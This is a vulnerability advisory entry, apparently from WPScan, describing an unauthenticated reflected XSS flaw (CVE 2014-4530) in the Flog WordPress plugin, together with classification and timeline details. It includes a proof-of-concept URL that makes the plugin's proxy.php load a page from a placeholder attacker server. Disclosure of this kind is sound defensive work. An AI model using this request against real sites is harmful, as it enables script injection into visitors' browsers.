Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)



Description
The last time it was checked the plugin was still affected and had been closed.
Proof of Concept
https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silex_server/cgi/scripts/proxy.php?url=[ATTACKER_SERVER]/test.html

With the payload in the test.html file controlled by the attackers

Affects Plugin

no known fix
- plugin closed

References

CVE 2014-4530
URL https://codevigilant.com/disclosure/wp-plugin-flog-a3-cross-site-scripting-xss/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 130
Verified No
WPVDB ID 10021

Timeline

Publicly Published 2014-04-25 (about 6 years ago)
Added 2020-01-13 (6 months ago)
Last Updated 2020-02-13 (5 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin